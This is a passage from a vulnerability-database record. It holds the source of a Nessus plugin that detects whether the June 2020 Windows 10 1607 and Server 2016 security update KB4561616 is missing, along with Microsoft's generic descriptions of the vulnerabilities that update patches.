"CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4561616.NASL", "href": "https://www.tenable.com/plugins/nessus/137258", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137258);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1266\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1287\",\n \"CVE-2020-1291\",\n \"CVE-2020-1293\",\n \"CVE-2020-1294\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\"\n );\n script_xref(name:\"MSKB\", value:\"4561616\");\n script_xref(name:\"MSFT\", value:\"MS20-4561616\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0248-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4561616: Windows 10 Version 1607 and Windows Server 2016 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4561616.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1302)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1235, CVE-2020-1282,\n CVE-2020-1304, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\");\n # https://support.microsoft.com/en-us/help/4561616/windows-10-update-kb4561616\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0526efa\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561616.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561616'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'14393',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561616])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:26", "description": "The remote Windows host is missing security update 4561602.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1334)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1302, CVE-2020-1312)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1316)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4561602: Windows 10 Version 1709 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", 